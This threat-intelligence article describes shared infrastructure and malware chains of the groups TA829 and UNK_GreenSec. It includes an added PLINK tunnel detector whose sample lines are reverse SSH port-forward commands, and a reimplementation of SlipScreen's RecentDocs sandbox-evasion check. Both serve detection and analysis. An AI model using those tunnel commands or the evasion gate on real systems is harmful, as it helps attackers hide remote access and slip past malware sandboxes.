TA829 and UNK_GreenSec Share Tactics and Infrastructure in Ongoing Malware Campaigns

Cybersecurity researchers have flagged the tactical similarities between the threat actors behind the RomCom RAT and a cluster that has been observed delivering a loader dubbed TransferLoader.

Enterprise security firm Proofpoint is tracking the activity associated with TransferLoader to a group dubbed UNK_GreenSec and the RomCom RAT actors under the moniker TA829. The latter is also known by the names CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu.

The company said it discovered UNK_GreenSec as part of its investigation into TA829, describing it as using an “unusual amount of similar infrastructure, delivery tactics, landing pages, and email lure themes.”

TA829 is unusual in the threat landscape in that it conducts both espionage and financially motivated attacks. The Russia-aligned hybrid group has also been linked to the zero-day exploitation of security flaws in Mozilla Firefox and Microsoft Windows to deliver RomCom RAT in attacks aimed at global targets.

Earlier this year, PRODAFT detailed the threat actors’ use of bulletproof hosting providers, living-off-the-land (LOTL) tactics, and encrypted command-and-control (C2) communications to sidestep detection.

TransferLoader, on the other hand, was first documented by Zscaler ThreatLabz in connection with a February 2025 campaign that delivered the Morpheus ransomware against an unnamed American law firm.

Proofpoint noted that campaigns undertaken by both TA829 and UNK_GreenSec rely on REM Proxy services that are deployed on compromised MikroTik routers for their upstream infrastructure. That said, the exact method used to breach these devices is not known.


“REM Proxy devices are likely rented to users to relay traffic,” the Proofpoint threat research team said. “In observed campaigns, both TA829 and UNK_GreenSec use the service to relay traffic to new accounts at freemail providers to then send to targets. REM Proxy services have also been used by TA829 to initiate similar campaigns via compromised email accounts.”

Given that the format of the sender addresses is similar — e.g., [email protected] and [email protected] — the threat actors are believed to be using some sort of email builder utility that automates the bulk creation of accounts and sending of phishing emails through REM Proxy nodes.

The messages act as a conduit to deliver a link, which is either directly embedded in the body or within a PDF attachment. Clicking on the link initiates a series of redirections via Rebrandly that ultimately take the victim to a fake Google Drive or Microsoft OneDrive page, while filtering out machines that have been flagged as sandboxes or deemed not of interest to the attackers.

It’s at this stage that the attack chains splinter into two, as the adversary infrastructure to which the targets are redirected is different, ultimately paving the way for TransferLoader in the case of UNK_GreenSec and a malware strain called SlipScreen in the case of TA829.

“TA829 and UNK_GreenSec have both deployed PuTTY’s PLINK utility to set up SSH tunnels, and both used IPFS services to host those utilities in follow-on activity,” Proofpoint noted.
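PLINK tunnels are easy to spot in process-creation telemetry if you look for the tunnel syntax rather than the binary name, since the binary is often renamed. The following is an added detection example written for this article, not code from Proofpoint or from the PuTTY project. It runs over constructed command lines (the paths, hosts and credentials are invented) and flags a tunnel when a `-R`/`-L` port-forward spec is present, or when a plink image is started with `-N` (no interactive shell) or `-pw` (password on the command line). The flags themselves are real PLINK options; the scoring rule is this example's own.

```python
import re

# Constructed sample process-creation command lines (not from the report).
SAMPLE_CMDLINES = [
    # renamed or not, the -R spec plus -N and -pw is classic tunnel setup
    r'C:\Users\Public\plink.exe -ssh -N -R 8443:127.0.0.1:3389 relay@203.0.113.10 -pw hunter2',
    # renamed binary: image name gives nothing away, the forward spec does
    r'"C:\ProgramData\p.exe" -batch -hostkey SHA256:abc -R 0.0.0.0:2222:127.0.0.1:445 203.0.113.10 -l u -pw x -N',
    # legitimate use: git over ssh via plink, no tunnel, no -N, no -pw
    r'C:\Program Files\PuTTY\plink.exe -ssh admin@git.internal.example -batch git-upload-pack repo',
    # unrelated noise
    r'C:\Windows\System32\cmd.exe /c dir',
]

# -R/-L followed by [bind_addr:]port:host:port (PLINK/OpenSSH forward syntax)
TUNNEL_FLAG = re.compile(r"(?<!\S)-[RL]\s+(?:[\w.\-]+:)?\d{1,5}:[\w.\-]+:\d{1,5}\b")
# PLINK-specific switches worth recording as context
PLINK_FLAGS = re.compile(r"(?<!\S)-(?:N|pw|batch|hostkey|ssh)\b")
# image name is plink(.exe), possibly quoted
PLINK_IMAGE = re.compile(r'(?i)(?:^|[\\/"])plink(?:\.exe)?"?(?=\s|$)')


def detect(cmdline: str) -> dict:
    """Return {"alert": bool, "reasons": [...]} for one command line."""
    reasons = []
    is_plink = bool(PLINK_IMAGE.search(cmdline))
    if is_plink:
        reasons.append("image name is plink")
    if TUNNEL_FLAG.search(cmdline):
        reasons.append("-R/-L port-forward spec")
    flags = set(PLINK_FLAGS.findall(cmdline))
    if "-N" in flags:
        reasons.append("-N (tunnel only, no shell)")
    if "-pw" in flags:
        reasons.append("-pw (password on command line)")
    # Rule (this example's own): a forward spec alone is enough, because
    # renamed binaries are common; otherwise require plink plus -N or -pw.
    alert = ("-R/-L port-forward spec" in reasons) or (
        is_plink and bool(flags & {"-N", "-pw"})
    )
    return {"alert": alert, "reasons": reasons}


def scan(cmdlines) -> list:
    """Indices of command lines that should raise an alert."""
    return [i for i, c in enumerate(cmdlines) if detect(c)["alert"]]


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = detect(c)
        print("ALERT" if r["alert"] else "ok   ", "; ".join(r["reasons"]) or "-", "|", c[:60])
```

The third sample matters: PLINK as a git SSH helper is common on Windows developer hosts, so alerting on the image name alone produces noise, whereas the forward spec and `-N` are rarely legitimate outside administration.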

SlipScreen is a first-stage loader designed to decrypt and load shellcode directly into memory and initiate communications with a remote server, but only after a Windows Registry check: it verifies that the target has at least 55 recent documents recorded under the “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs” key, a heuristic for telling a real user’s workstation from a freshly provisioned sandbox.
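The check above is a simple population heuristic, and it is worth seeing both how the count can be derived and why a sandbox with a thin user profile fails it. The following is an added example written for this article, not SlipScreen’s own code: it parses the `MRUListEx` value of the RecentDocs key (a list of little-endian DWORD slot indices, most recent first, terminated by `0xFFFFFFFF`) and applies the 55-entry threshold. That SlipScreen counts entries this way, and that the comparison is “at least” rather than “more than”, are assumptions; the sample blobs are constructed, not real registry data.

```python
import struct
import sys

RECENT_DOCS_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"
MIN_RECENT_DOCS = 55  # threshold reported for SlipScreen


def count_mrulistex(blob: bytes) -> int:
    """Count live entries in an MRUListEx value.

    MRUListEx is a sequence of little-endian DWORD slot indices terminated
    by 0xFFFFFFFF; trailing bytes that do not form a full DWORD are ignored.
    """
    usable = blob[: len(blob) - len(blob) % 4]
    n = 0
    for (slot,) in struct.iter_unpack("<I", usable):
        if slot == 0xFFFFFFFF:
            break
        n += 1
    return n


def looks_like_real_user(recent_count: int, threshold: int = MIN_RECENT_DOCS) -> bool:
    """The gate as described: proceed only with enough recent documents.
    (Assumed to be a >= comparison.)"""
    return recent_count >= threshold


def make_mrulistex(n: int) -> bytes:
    """Constructed sample blob with n entries, not real registry data."""
    return b"".join(struct.pack("<I", i) for i in range(n)) + b"\xff\xff\xff\xff"


def live_recent_docs_count() -> int:
    """Read the real value on a Windows host; returns -1 on other platforms."""
    if sys.platform != "win32":
        return -1
    import winreg  # only available on Windows
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RECENT_DOCS_KEY) as key:
        blob, _value_type = winreg.QueryValueEx(key, "MRUListEx")
    return count_mrulistex(blob)


if __name__ == "__main__":
    # A fresh sandbox profile typically has a handful of entries; a long-lived
    # workstation has dozens, which is what the threshold is meant to separate.
    for n in (3, 54, 55, 120):
        c = count_mrulistex(make_mrulistex(n))
        print(f"{n:>3} recent docs -> proceeds: {looks_like_real_user(c)}")
    print("this host:", live_recent_docs_count())
```

The defensive takeaway is the inverse of the check: a detonation sandbox whose user profile carries a realistic RecentDocs history (well above 55 entries, with plausible file names and extension subkeys) will not be filtered out by this gate, while a clean image will never see the second stage.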

The infection sequence then deploys a downloader, either MeltingClaw (aka DAMASCENED PEACOCK) or RustyClaw, which in turn drops a backdoor such as ShadyHammock or DustyHammock. ShadyHammock is used to launch SingleCamper (aka SnipBot), an updated version of RomCom RAT.

DustyHammock, besides running reconnaissance commands on an infected system, comes fitted with the ability to download additional payloads hosted on the InterPlanetary File System (IPFS) network.

Campaigns propagating TransferLoader have been found to leverage job opportunity-themed messages to trick victims into clicking on a link that ostensibly leads to a PDF resume, but, in reality, results in the download of TransferLoader from an IPFS webshare.

TransferLoader’s primary objective is to fly under the radar and serve more malware, such as Metasploit and Morpheus ransomware, a rebranded version of HellCat ransomware.


“Unlike the TA829 campaigns, the TransferLoader campaigns’ JavaScript components redirected users to a different PHP endpoint on the same server, which allows the operator to conduct further server-side filtering,” Proofpoint said. “UNK_GreenSec used a dynamic landing page, often irrelevant to the OneDrive spoof, and redirected users to the final payload that was stored on an IPFS webshare.”

The overlapping tradecraft between TA829 and UNK_GreenSec points to one of four possibilities:

  • The threat actors are procuring distribution and infrastructure from the same third-party provider
  • TA829 acquires and distributes infrastructure on its own, and has provided these services to UNK_GreenSec
  • UNK_GreenSec is the infrastructure provider that typically offers its warez to TA829, but decided to temporarily use it to deliver its own malware, TransferLoader
  • TA829 and UNK_GreenSec are one and the same, and TransferLoader is a new addition to their malware arsenal

“In the current threat landscape, the points at which cybercrime and espionage activity overlap continue to increase, removing the distinctive barriers that separate criminal and state actors,” Proofpoint said. “Campaigns, indicators, and threat actor behaviors have converged, making attribution and clustering within the ecosystem more challenging.”

“While there is not sufficient evidence to substantiate the exact nature of the relationship between TA829 and UNK_GreenSec, there is very likely a link between the groups.”
